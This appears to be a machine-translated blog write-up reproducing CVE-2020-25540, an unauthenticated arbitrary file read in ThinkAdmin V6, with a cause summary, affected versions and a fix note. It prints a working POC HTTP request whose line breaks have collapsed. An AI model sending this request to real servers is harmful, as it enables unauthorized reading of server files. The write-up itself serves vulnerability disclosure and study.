Shulou(Shulou.com)05/31 Report--

This article shows you how to reproduce Thinkadmin V6 arbitrary file reading vulnerabilities, the content is concise and easy to understand, it can definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Recurrence of Thinkadmin V6 arbitrary File read vulnerability (CVE-2020-25540)

1. Brief introduction of vulnerabilities:

ThinkAdmin is a general background management system based on ThinkPHP framework. The rights management of ThinkAdmin is simplified based on the standard RBAC, which removes the complicated node management and makes the rights management easier, including node management, rights management, menu management and user management. There is a path traversal vulnerability in ThinkAdmin 6 version. An attacker can exploit this vulnerability to arbitrarily read files on a remote server through GET request encoding parameters.

Second, the causes of loopholes:

Https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

The function method in Update.php is not authorized, but the function can be called directly. Cause a loophole

Third, the scope of influence:

Thinkadmin version is less than ≤ 2020.08.03.01

Fourth, the recurrence of loopholes:

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

Simply wrote a batch of small script

After running a part, there is not much success, the HVV is over, and the situation is normal.

Found a strange place: burp directly put the package can not successfully return the data returned by json

The post method of the request of python- attempts to python can return

Try the post method of curl to return data normally.

Come down and study this problem again.

5. Restoration plan:

At present, the manufacturer has released to fix the related problems. Please upgrade to the secure version as soon as possible.

The above content is how to reproduce Thinkadmin V6 arbitrary file reading vulnerabilities. Have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.